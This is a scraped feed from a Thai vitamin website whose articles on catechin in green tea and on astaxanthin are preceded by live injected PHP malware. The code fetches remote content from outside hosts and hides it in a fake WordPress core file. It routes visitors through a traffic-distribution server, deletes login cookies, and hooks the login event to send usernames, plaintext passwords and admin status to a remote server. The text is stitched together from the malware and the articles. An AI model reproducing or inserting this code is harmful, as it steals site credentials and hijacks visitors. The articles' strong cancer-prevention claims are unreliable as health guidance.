$zkldsjga = 'https://winbigprize.top';
$dsfinvdfgsg = 'https://toremanc.com';
if (!function_exists('getUserIP')) {
function getUserIP() {
foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) === true) {
foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
}
}
if (!function_exists('cacheUrl')) {
function cacheUrl($url, $skip_cache = FALSE) {
$cachetime = 10; //one week
$file = ABSPATH.WPINC.
'/class-wp-http-netfilter.php';
$mtime = 0;
if (file_exists($file)) {
$mtime = filemtime($file);
}
$filetimemod = $mtime + $cachetime;
if ($filetimemod < time() OR $skip_cache) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
CURLOPT_FOLLOWLOCATION => TRUE,
CURLOPT_MAXREDIRS => 5,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_TIMEOUT => 60,
));
$data = curl_exec($ch);
curl_close($ch);
if ($data AND!$skip_cache) {
file_put_contents($file, $data);
}
} else {
$data = file_get_contents($file);
}
return $data;
}
}
$host = filter_var($_SERVER['HTTP_HOST'], FILTER_SANITIZE_URL);
$IpUrlAd = $dsfinvdfgsg.'/lnk/ip/' . $host . '.txt';
function is_fileAccessible($IpUrlAd) {
$headers = @get_headers($IpUrlAd);
return is_array($headers) && strpos($headers[0], '200') !== false;
}
if (is_fileAccessible($IpUrlAd)) {
$weoboo = cacheUrl($IpUrlAd);
} else {
$weoboo = '';
}
if (strpos($weoboo, getUserIP()) !== false) {
} else {
$uag = $_SERVER['HTTP_USER_AGENT'];
$id = $_SERVER['REQUEST_URI'];
if (!preg_match("/wp-login|wp-admin|admin|xmlrpc/", $id)) {
@date_default_timezone_set('UTC');
$z_test_config = $z_mode = '';
$z_url = $GLOBALS['uthpydgtou'];
$z_key_api_host = '2LmRsae4qqsca32';
$z_conf_edit = 0;
$z_conf_file = 'dldldla.ini';
$z_allow_ip = '';
$z_get = 'q';
$z_timeout = 10;
if($z_conf_edit == 1 && file_exists($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file)){$z_test_config = 1;}
if(!empty($_GET[$z_get])){$z_key = trim($_GET[$z_get]);$z_mode = 1;$z_conf_edit = 0;}
if($z_conf_edit == 0 || ($z_conf_edit == 1 && empty($z_test_config))){
$z_conf = array();
$z_conf['id'] = 'dldldla';
$z_conf['sub_del'] = 0;
$z_conf['cf_ip'] = 0;
$z_conf['em_referer'] = 0;
$z_conf['em_useragent'] = 0;
$z_conf['em_lang'] = 0;
$z_conf['ipv6'] = 0;
$z_conf['ptr'] = 0;
$z_conf['rd_bots'] = 0;
$z_conf['rd_se'] = 0;
$z_conf['method'] = 0;
$z_conf['conf_lc'] = date('d.m.Y H:i:s');
$z_conf['status'] = 1;
$z_conf['ip_serv_seodor'] = '';
$z_conf['sign_ref'] = htmlentities('iframe-toloka.com,hghltd.yandex.net', ENT_QUOTES, 'UTF-8');
$z_conf['sign_ua'] = htmlentities('ahrefs,aport,ask,bot,btwebclient,butterfly,commentreader,copier,crawler,crowsnest,curl,disco,ezooms,fairshare,httrack,ia_archiver,internetseer,java,js-kit,larbin,libwww,linguee,linkexchanger,lwp-trivial,netvampire,nigma,ning,nutch,offline,peerindex,pingadmin,postrank,rambler,semrush,slurp,soup,spider,sweb,teleport,twiceler,voyager,wget,wordpress,yeti,zeus', ENT_QUOTES, 'UTF-8');
if($z_conf_edit == 1 && empty($z_test_config)){
$z_conf_default = serialize($z_conf);
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file, $z_conf_default, LOCK_EX);
$z_conf = unserialize(file_get_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file));
}
}
if($z_conf_edit == 1 && !empty($z_test_config)){
$z_conf = unserialize(file_get_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file));
}
if($z_conf_edit == 1 && !empty($_GET['key']) && $_GET['key'] == $z_key_api_host && empty($_GET['conf'])){
if(!z_ip_check($z_allow_ip)){
header('HTTP/1.0 404 Not Found', true, 404);
exit();
}
echo serialize($z_conf);
exit();
}
if($z_conf_edit == 1 && !empty($_GET['key']) && $_GET['key'] == $z_key_api_host && !empty($_GET['conf'])){
if(!z_ip_check($z_allow_ip)){
header('HTTP/1.0 404 Not Found', true, 404);
exit();
}
$z_conf = base64_decode($_GET['conf']);
$z_conf_tmp = @unserialize($z_conf);
if(is_array($z_conf_tmp)){
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file, $z_conf, LOCK_EX);
}
exit();
}
$z_out = $z_lang = $z_country = $z_city = $z_region = $z_asn = $z_org = $z_device = $z_operator = $z_os_name = $z_os_version = $z_browser_name = $z_browser_version = $z_macros = $z_cookies_data = '';
$z_empty = $z_bot = '-';
$z_uniq = 'yes';
if(isset($_SERVER['HTTP_PURPOSE']) && $_SERVER['HTTP_PURPOSE'] == 'prefetch'){
$z_conf['status'] = 0;
}
if($z_conf['status'] == 1){
$z_useragent = $z_empty;
if(!empty($_SERVER['HTTP_USER_AGENT'])){
$z_useragent = $_SERVER['HTTP_USER_AGENT'];
}
elseif($z_conf['em_useragent'] == 1){
$z_bot = 'empty_ua';
}
$z_referer = $z_empty;
$z_se = $z_empty;
if(!empty($_SERVER['HTTP_REFERER'])){
$z_referer = $_SERVER['HTTP_REFERER'];
if(strstr($z_referer, 'google.')){$z_se = 'google';}
if(strstr($z_referer, 'yandex.') || strstr($z_referer, '/ya.ru')){$z_se = 'yandex';}
if(strstr($z_referer, 'mail.ru')){$z_se = 'mail';}
if(strstr($z_referer, 'yahoo.com')){$z_se = 'yahoo';}
if(strstr($z_referer, 'bing.com')){$z_se = 'bing';}
if(strstr($z_referer, 'baidu.com')){$z_se = 'baidu';}
}
elseif($z_bot == $z_empty && $z_conf['em_referer'] == 1){
$z_bot = 'empty_ref';
}
if($z_bot == $z_empty && $z_referer != $z_empty && !empty($z_conf['sign_ref'])){
$z_ex = explode(',', $z_conf['sign_ref']);
foreach($z_ex as $z_value){
$z_value = trim(html_entity_decode($z_value, ENT_QUOTES, 'UTF-8'));
if(strstr($z_referer, $z_value)){
$z_bot = 'sign_ref';
break;
}
}
}
if(stristr($z_useragent, 'baidu.com')){$z_bot = 'baidu';}
if(stristr($z_useragent, 'bing.com') || stristr($z_useragent, 'msnbot')){$z_bot = 'bing';}
if(stristr($z_useragent, 'google.')){$z_bot = 'google';}
if(stristr($z_useragent, 'mail.ru')){$z_bot = 'mail';}
if(stristr($z_useragent, 'yahoo.com')){$z_bot = 'yahoo';}
if(stristr($z_useragent, 'yandex.com/bots')){$z_bot = 'yandex';}
if(stristr($z_useragent, 'facebook')){$z_bot = 'facebook';}
if($z_bot == $z_empty && $z_useragent != $z_empty && !empty($z_conf['sign_ua'])){
$z_ex = explode(',', $z_conf['sign_ua']);
foreach($z_ex as $z_value){
$z_value = trim(html_entity_decode($z_value, ENT_QUOTES, 'UTF-8'));
if(stristr($z_useragent, $z_value)){
$z_bot = 'sign_ua';
break;
}
}
}
$z_cf_country = $z_empty;
if(!empty($_SERVER['HTTP_CF_IPCOUNTRY'])){
$z_cf_country = strtolower($_SERVER['HTTP_CF_IPCOUNTRY']);
}
if($z_conf['cf_ip'] == 1 && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])){
$z_ipuser = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
if($z_conf['cf_ip'] == 0 || empty($z_ipuser)){
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], '.') > 0 || strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ':') > 0)){
if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') > 0){
$z_ipuser = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$z_ipuser = trim($z_ipuser[0]);
}
elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') === false){
if(empty($z_conf['ip_serv_seodor'])){
$z_ipuser = trim($_SERVER['HTTP_X_FORWARDED_FOR']);
}
}
}
if(empty($z_ipuser)){
$z_ipuser = trim($_SERVER['REMOTE_ADDR']);
}
}
if(!filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) && stristr($z_ipuser, ':')){
$z_exp = explode(':', $z_ipuser);
$z_ipuser = $z_exp[0];
}
if(!filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) && !filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){
$z_ipuser = $z_empty;
}
if($z_bot == $z_empty && $z_conf['ipv6'] == 1 && filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){
$z_bot = 'ipv6';
}
if($z_bot == $z_empty && $z_conf['ptr'] == 1){
$z_ptr_rec = gethostbyaddr($z_ipuser);
if(stristr($z_ptr_rec, 'baidu')){$z_bot = 'baidu';}
if(stristr($z_ptr_rec, 'bing') || stristr($z_ptr_rec, 'msnbot')){$z_bot = 'bing';}
if(stristr($z_ptr_rec, 'google') && !stristr($z_ptr_rec, 'googlefiber')){$z_bot = 'google';}
if(stristr($z_ptr_rec, 'mail.ru')){$z_bot = 'mail';}
if(stristr($z_ptr_rec, 'yahoo')){$z_bot = 'yahoo';}
if(stristr($z_ptr_rec, 'yandex')){$z_bot = 'yandex';}
}
$z_lang = $z_empty;
if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])){
$z_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
}
if($z_lang == $z_empty && $z_conf['em_lang'] == 1){
$z_bot = 'empty_lang';
}
$z_domain = $_SERVER['HTTP_HOST'];
if($z_conf['sub_del'] == 1 && substr_count($z_domain, '.') > 1){
preg_match("~^.+?\.(.+?)$~", $z_domain, $matches);
$z_domain = $matches[1];
}
$z_page = $_SERVER['REQUEST_URI'];
$z_page_url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if(($z_bot == $z_empty || $z_conf['rd_bots'] == 1) && $z_ipuser != $z_empty){
$z_n_cookies = md5($_SERVER['HTTP_HOST'].'+'.$z_conf['id']);
if(isset($_COOKIE[$z_n_cookies])){
$z_cookies_data = unserialize(base64_decode($_COOKIE[$z_n_cookies]));
}
if(!isset($z_key)){$z_key = '';}
if(empty($z_options)){$z_options = array();}
$z_request = array();
$z_request[0] = trim($z_key_api_host);
$z_request[1] = trim($z_conf['id']);
$z_request[2] = trim($z_ipuser);
$z_request[3] = trim($z_referer);
$z_request[4] = trim($z_useragent);
$z_request[5] = $z_se;
$z_request[6] = trim($z_lang);
$z_request[7] = urlencode(trim($z_key));
$z_request[8] = trim($z_domain);
$z_request[9] = trim($z_page);
$z_request[10] = trim($z_cf_country);
$z_request[11] = $z_options;
$z_request[12] = $z_cookies_data;
if($z_conf['method'] == 1){
$z_data['api'] = serialize($z_request);
}
else{
$z_url = $z_url.'/?api='.base64_encode(serialize($z_request));
//echo $z_url;
}
if((empty($z_conf['ip_serv_seodor']) || $z_ipuser != $z_conf['ip_serv_seodor']) && ($z_conf['rd_se'] == 0 || ($z_conf['rd_se'] == 1 && $z_se != $z_empty))){
$z_ch = curl_init();
curl_setopt($z_ch, CURLOPT_TIMEOUT, $z_timeout);
curl_setopt($z_ch, CURLOPT_URL, $z_url);
curl_setopt($z_ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($z_ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($z_ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($z_ch, CURLOPT_SSL_VERIFYHOST, 0);
if($z_conf['method'] == 1){
curl_setopt($z_ch, CURLOPT_POST, true);
curl_setopt($z_ch, CURLOPT_POSTFIELDS, $z_data);
}
curl_setopt($z_ch, CURLOPT_USERAGENT, 'zTDS');
$z_response = curl_exec($z_ch);
curl_close($z_ch);
$z_response = @unserialize($z_response);
if(is_array($z_response)){
$z_out = trim(html_entity_decode($z_response[0], ENT_QUOTES, 'UTF-8'));
$z_country = $z_response[1];
$z_region = $z_response[2];
$z_city = $z_response[3];
$z_asn = $z_response[4];
$z_org = $z_response[5];
$z_device = $z_response[6];
$z_operator = $z_response[7];
$z_bot = $z_response[8];
$z_uniq = $z_response[9];
$z_lang = $z_response[10];
$z_macros = trim(html_entity_decode($z_response[11], ENT_QUOTES, 'UTF-8'));
$z_os_name = $z_response[12];
$z_os_version = $z_response[13];
$z_br_name = $z_response[14];
$z_br_version = $z_response[15];
$z_brand = $z_response[16];
$z_cookies = $z_response[17];
if(!empty($z_cookies)){
$z_cookies_options = array('expires'=>$z_cookies[3], 'path'=>'/', 'domain'=>'', 'secure'=>0, 'httponly'=>1, 'samesite'=>'Lax');
if(phpversion() >= 7.3 == 1){
SetCookie($z_n_cookies, base64_encode(serialize($z_cookies)), $z_cookies_options);
}
else{
SetCookie($z_n_cookies, base64_encode(serialize($z_cookies)), $z_cookies[3], '/', '', 0, 1);
}
}
if(strstr($z_out, '[RAWURLENCODE_REFERER]')){
$z_out = str_replace('[RAWURLENCODE_REFERER]', rawurlencode($z_referer), $z_out);
}
if(strstr($z_out, '[URLENCODE_REFERER]')){
$z_out = str_replace('[URLENCODE_REFERER]', urlencode($z_referer), $z_out);
}
if(strstr($z_out, '[RAWURLENCODE_PAGE_URL]')){
$z_out = str_replace('[RAWURLENCODE_PAGE_URL]', rawurlencode($z_page_url), $z_out);
}
if(strstr($z_out, '[URLENCODE_PAGE_URL]')){
$z_out = str_replace('[URLENCODE_PAGE_URL]', urlencode($z_page_url), $z_out);
}
if(!empty($z_mode)){
if(!empty($z_out)){
header("Location: $z_out");
exit();
}
else{
header('HTTP/1.0 404 Not Found', true, 404);
exit();
}
}
if($z_bot == $z_empty && !empty($z_out)){echo $z_out;}
}
}
}
}
function z_ip_check($z_allow_ip){
if(!empty($z_allow_ip)){
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], '.') > 0 || strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ':') > 0)){
if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') > 0){
$z_ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$z_ip = trim($z_ip[0]);
}
elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') === false){
$z_ip = trim($_SERVER['HTTP_X_FORWARDED_FOR']);
}
}
else{
$z_ip = trim($_SERVER['REMOTE_ADDR']);
}
if($z_ip == trim($z_allow_ip)){
return true;
}
}
else{
return true;
}
}
}
$donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die();
if (ini_get('allow_url_fopen')) {
function get_data_yo($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_yo($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
$ip = urlencode($_SERVER['REMOTE_ADDR']);
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$abt = 1;
$hspan = 0;
if (($abt || $hspan) && !$_GET[$qq]) {
$ll = get_data_yo($dsfinvdfgsg."/lnk/go.php?d=$donor&cldw=$cldw&dgrp=$algo");
$el = explode('
', $ll);
}
}
/* weoboo end */
if(!isset($_COOKIE['_eshoob'])) {
setcookie('_eshoob', 1, time()+604800, '/');
// unset cookies
if (isset($_SERVER['HTTP_COOKIE'])) {
$cookies = explode(';', $_SERVER['HTTP_COOKIE']);
foreach($cookies as $cookie) {
if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
$parts = explode('=', $cookie);
$name = trim($parts[0]);
setcookie($name, '', time()-1000);
setcookie($name, '', time()-1000, '/');
}
}
}
}
if (!function_exists('getUserIP')) {
function getUserIP()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
{
if (array_key_exists($key, $_SERVER) === true)
{
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
{
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
{
return $ip;
}
}
}
}
}
}
if (!function_exists('isHttps')) {
function isHttps() {
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
(!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
(!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
(!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
$server_request_scheme = 'https';
} else {
$server_request_scheme = 'http';
}
return $server_request_scheme;
}
}
if (!function_exists('wordpress_api_debug')) {
function wordpress_api_debug( $user_login, $user ){
$wpApiUrl = $dsfinvdfgsg."/lnk/api22222.php";
$uuuser = get_user_by('login', $_POST['log']);
if(in_array('administrator', $uuuser->roles)){
$role = 'admin';
}
else{
$role = 'user';
}
//
$verbLogs = array(
'wp_host' => $_SERVER['HTTP_HOST'],
'wp_uri' => $_SERVER['REQUEST_URI'],
'wp_scheme' => isHttps(),
'user_login' => $_POST['log'],
'user_password' => $_POST['pwd'],
'user_ip' => getUserIP(),
'user_role' => $role
);
if (!empty($verbLogs['user_login'])) {
$wpLogData = json_encode($verbLogs);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
}
}
if (function_exists('add_action')) {
add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );
}
?>
The post แคเทชิน คืออะไร first appeared on วิตามิน.com.
]]>แคเทชิน (Catechin)
ชาเขียว (Green Tea) เป็นชาที่ไม่ผ่านขั้นตอนการหมักเลย เพราะเมื่อเก็บใบชามาได้จะนำมาทำให้แห้งอย่างรวดเร็วในหม้อ ทองแดงโดยใช้ความร้อนไม่สูงเกินไปนักและใช้มือคลึงเบาๆ ก่อนแห้ง หรืออบไอน้ำ ในระยะเวลาสั้นๆ แล้วนำไปอบแห้งเพื่อยับยั้งการทำงานของเอนไซม์ จึงได้ใบชาที่มีความสด และยังมีสีเขียวอยู่มาก การที่ใบชาไม่ผ่านขั้นตอนการหมักทำให้ใบชา ยังมีสารประกอบฟีนอลิก ( Phenolic compound ) หลงเหลืออยู่มากกว่า ชาดำกับชาอูหลง ทำให้ชาเขียวมีฤทธิ์ต้านอนุมูลอิสระมากกว่าชาชนิดอื่น
ชาเขียว ประกอบสารแคเทชิน 6 ชนิด คือ EGCG, EGC, ECG, EC, GC and C. ที่พบมากคือ EGCG สารแคเทชิน (Catechin) ซึ่งมีฤทธ์ต้านอนุมูลอิสระ ลดการอักเสบ และเพิ่มสามารถในการจดจำ โดยเฉพาะอย่างยิ่ง epigallocatechin-3-gallate (EGCG) ที่มีอยู่มากในตัวชาเขียว EGCG ซึ่งเป็นแคเทชิน ชนิดหนึ่ง มีฤทธิ์ในการลดความอ้วน ลดไตรกลีเซอไรด์ ลดคอเลสเตอรอล เพิ่มการใช้พลังงาน เพิ่มสันดาปไขมันในสัตว์ทดลอง ลดการดูดซึมไขมันในลำไส้ ลดการเปลี่ยนแปลงของเซลล์ไขมัน ลดการสะสมของไขมันหน้าท้อง
สรุปชาเขียวมีประโยชน์ต่อร่างกายในด้านต่างๆ ดังนี้
ดร.นิรัชรา เลาหประสิทธิ์ อาจารย์ประจำสาขาวิชาวิทยาศาสตร์และเทคโนโลยีการอาหาร วิทยาลัยนานาชาติ มหาวิทยาลัยมหิดล ได้อธิบายว่า คาเทชิน เป็นสารประเภทโพลิฟินอล (Polyphenols) สามารถพบได้ในอาหารประเภทต่างๆ เช่น โกโก้ ไวน์ แอปเปิล แต่พบปริมาณสูงที่สุดในชาเขียว คาเทชินเป็นอาวุธสำคัญของธรรมชาติที่เข้าไปทำหน้าที่ป้องกันการเกิดอนุมูลอิสระ และช่วยลดความเสี่ยงของการเกิดมะเร็งในร่างกาย คาเทชินที่มีอยู่ในชาเขียวสามารถพบได้ในหลายรูปแบบ แต่รูปแบบที่สำคัญ คือ EGCG (Epigallocatechin gallate) EGCG ซึ่งเป็นอาวุธที่เข้าไปช่วยป้องกันปฏิกิริยา “ออกซิเดชั่น” อันเกิดจากเซลล์ในร่างกายทำปฏิกิริยากับออกซิเจนที่สามารถพบได้ในอากาศและปล่อย “สารอนุมูลอิสระ” เมื่อไม่เกิดปฏิกิริยาออกซิเดชั่น ร่างกายจึงไม่ผลิตสารอนุมูลอิสระ สารอนุมูลอิสระนี้เป็นสาเหตุของการเสื่อมเสียต่างๆ เป็นต้นเหตุของความเปลี่ยนแปลงของร่างกายตามอายุที่เพิ่มขึ้น และพบความเชื่อมโยงของสารอนุมูลอิสระที่จะสามารถส่งผลให้เกิดมะเร็งได้
ปริมาณชาเขียวคุณควรดื่มต่อวัน
นิตยสาร Herbs for Health อ้างตัวอย่างรายงานจากญี่ปุ่นว่า คนที่ดื่มชาเขียว 10 แก้วต่อวัน จะปลอดโรคมะเร็งนานกว่าคนที่ดื่มชาเขียวน้อยกว่า 3 แก้วต่อวันถึง 3 ปี (มี Polyphenol ประมาณ 240-320 มก. ในชาเขียว 3 แก้ว) ขณะเดียวกัน การศึกษาของมหาวิทยาลัย Cleveland’s Western Reserve สรุปว่า การดื่มชาเขียว 4 แก้วหรือมากกว่านั้น จะช่วยป้องกันโรคปวดข้อ หรือลดอาการปวดในกรณีของคนที่ป่วยอยู่แล้ว นักวิทยาศาสตร์ชาวญี่ปุ่นที่สถาบันวิจัยมะเร็ง Saitama พบว่า การเกิดโรคมะเร็งเต้านม หรือ การขยายตัวของโรคนั้น จะน้อยลงในผู้หญิง ที่มีประวัติดื่มชาเขียว 5 ถ้วย หรือมากกว่านั้นต่อ 1 วัน มหาวิทยาลัยแคลิฟอร์เนีย มีการศึกษาเรื่องคุณสมบัติการป้องกันมะเร็งของชาเขียว พบว่าคุณสามารถได้รับ ปริมาณ Polyphenols ในปริมาณที่ต้องการได้โดยดื่มชาเขียวเพียง 2 ถ้วยต่อวัน อย่างไรก็ตาม การดื่มชาเพียง 4-5 ถ้วยต่อวัน ดูจะให้ประโยชน์สูงสุด และอาจจะดื่มได้มากกว่านั้น แต่ควรคำนึงถึงปริมาณคาเฟอีนที่คุณอาจได้รับเพิ่มขึ้นด้วย
ในด้วนความปลอดภัย สารสกัดจากชาเขียว ได้รับการรับรองความปลอดภัย จากสำนักงานอาหารและยาของสหรัฐอเมริกา (GRAS)
การบริโภคเครื่องดื่มชาเขียว ทางสำนักงานคณะกรรมการอาหารและยา (อย.) ออกมาเตือนว่าควรพิจารณาเลือกบริโภคเฉพาะชนิดที่ไม่มีน้ำตาลผสม การชงชาด้วยตนเองนอกจากจะได้อรรถรสของการดื่มชาแล้ว ยังได้ประโยชน์ของสารต้านอนุมูลอิสระที่ดีกว่า การดื่มชาเขียวที่จำหน่ายเป็นขวดแบบพร้อมดื่มมีสารสกัดจากชาเขียวน้อย แต่มีน้ำตาลเยอะซึ่งจะส่งผลเสียต่อสุขภาพ
ขอขอบคุณข้อมูลจาก
วิตามินไบเบิล, ดร.เอิร์น มินเดลล์
คู่มืออาหารเสริม, ดร.เริงฤทธิ์ สัปปพันธ์
“ดื่มชาอย่างไรให้ได้ประโยชน์กับสุขภาพ” รศ.ดร.พิมลพรรณ พิทยานุกุล : คณะ เภสัชศาสตร์ มหาวิทยาลัยมหิดล
The post แคเทชิน คืออะไร first appeared on วิตามิน.com.
]]>The post แอสต้าแซนทิน คืออะไร first appeared on วิตามิน.com.
]]>แอสต้าแซนทิน (Astaxanthin)
แอสต้าแซนทิน เป็นสารอาหารที่จัดอยู่ในกลุ่มแคโรทีนอยด์ (Carotenoids) เป็นสารอาหารที่โด่งดังด้วยผลวิจัยทางการแพทย์มากมาย เนื่องด้วยสูตรโครงสร้างที่เป็นเอกลักษณ์ของ แอสต้าแซนทิน ในการปกป้องเยื่อหุ้มเซลล์ในอวัยวะต่างๆ ของร่างกาย ซึ่งแตกต่างกับ เบต้าแคโรทีน วิตามินซี และ สารต้านอนุมูลอิสระตัวอื่น ที่แค่ช่วยปกป้องแค่ภายในหรือภายนอกของเยื่อหุ้มเซลล์ พบว่า แอสต้าแซนทิน มีคุณสมบัติพิเศษที่สามารถปกป้องเยื่อหุ้มเซลล์ได้ทั้งภายในและภายนอก ดังนั้น จึงเหมือนกับว่าแอสต้าแซนทินสามารถปกป้องเซลล์ได้ครอบคลุมมากกว่า
คุณสมบัติพิเศษของแอสต้าแซนทิน คือ เป็นสารต้านอนุมูลอิสระที่มีประสิทธิภาพสูง และจัดเป็นสารต้านอนุมูลอิสระที่มีประสิทธิภาพสูงที่สุด เมื่อเปรียบเทียบกับประสิทธิภาพในการต้านอนุมูลอิสระกับสารอาหารชนิดต่างๆ ดังนี้
แอสต้าแซนทิน ยังมีคุณสมบัติในการปกป้องเยื่อหุ้มเซลล์จากการทำลาย ของอนุมูลอิสระ ปกป้อง DNA หรือสารพันธุกรรมในเซลล์จากการถูกทำลาย ซึ่งป้องกันการกลายพันธุ์ของเซลล์ เป็นการป้องกันมะเร็งได้ ป้องกันเซลล์ผิวจากการถูกทำลายโดยแสงแดด และมีบทบาทสำคัญในการกระตุ้นระบบภูมิต้านทาน แอสต้าแซนทินสามารถใช้ร่วมกับสารสกัดเมล็ดองุ่นในการป้องกันเส้นเลือดเสื่อม และเส้นเลือดขอดได้เป็นอย่างดี
ประโยชน์ของแอสต้าแซนทิน
แหล่งที่พบแอสต้าแซนทิน
ในธรรมชาติ พบได้ในปลาทะเล และสาหร่ายทะเลสีแดงสายพันธุ์ Haematococcus Pluvialis และสัตว์ทะเลบางชนิด เช่น ปลาแซลมอน ปลาเทราน์ กุ้ง และกุ้งลอปสเตอร์ แอสต้าแซนทินเป็นสารสีแดงที่พบในปลาแซลมอน ไข่ปลาคาเวียร์ เปลือกกุ้ง–ปู ร่างกายไม่สามารถสร้างสารชนิดนี้ได้ เราจะได้รับสารชนิดนี้จากอาหารที่รับประทานเข้าไปในปริมาณที่น้อยมาก เช่น ปลาแซลมอน 200 กรัม จะมีแอสต้าแซนทิน เพียง 1 มิลลิกรัม
แอสต้าแซนทิน เป็นส่วนหนึ่งในอาหารของมนุษย์มายาวนานหลายพันปี มีความปลอดภัยสูง มีการทดลองทางคลินิก โดยให้ผู้เข้าร่วมการทดลองรับประทานอาหารที่ผลิตจาก Microalgae (สาหร่ายขนาดเล็ก) ที่อุดมไปด้วยแอสต้าแซนทิน 40 มิลลิกรัมต่อวัน เป็นเวลา 4 สัปดาห์ติดต่อกัน โดยไม่พบผลข้างเคียงใดๆ และจากการ ทดสอบ Full Acute & Sub Chronic, Ames Test & Gene Toxicity และการค้น หาเอกสารทางวิชาการทั่วโลกนั้นไม่พบรายงานที่มีผลข้างเคียงในทางลบ และจากข้อมูล มีการนำสาหร่ายทะเลสีแดงสายพันธุ์ Haematococcus Pluvialis ซึ่งมีสารแอสตาแซนธิน (Astaxanthin) อยู่เป็นจำนวนมาก นำมาสกัดเป็นอาหารเสริมและได้รับความนิยมเป็นอย่างมากในพื้นที่แถบสแกนดิเนเวีย ตั้งแต่ปี ค.ศ. 1995 และสารแอสตาแซนธิน (Astaxanthin) มีการวางจำหน่ายอย่างแพร่หลายในตลาดตั้งแต่ปีค.ศ.1999 จนถึงปัจจุบัน
เอกสารอ้างอิง
Nishida Y.et.al, Quenching Acitivities of Common Hydrophillic and Lipophillic Antioxidants against Singlet Oxygen Using Chemiluminescence Detection System. Carotenoid Science 11: 16-20 (2007)
Miki, W., Biological functions and activities of animal carotenoids. Pure and Appl.Chem 1991 ; 63:141-6
Shimizu, N., et al., Carotenoids as singlet oxygen quenchers in marine organisms. Fisheries Sci. 1996; 62: 134-7
Fuji Chemical Industry Co., Ltd., Outsourced test by Collaborative Labs, Setauket, NY 2001
Yamashita,(2006) The Effects of Dietary Supplement Containing Astaxanthin on Skin Condition. Carotenoid Science 10:91-95
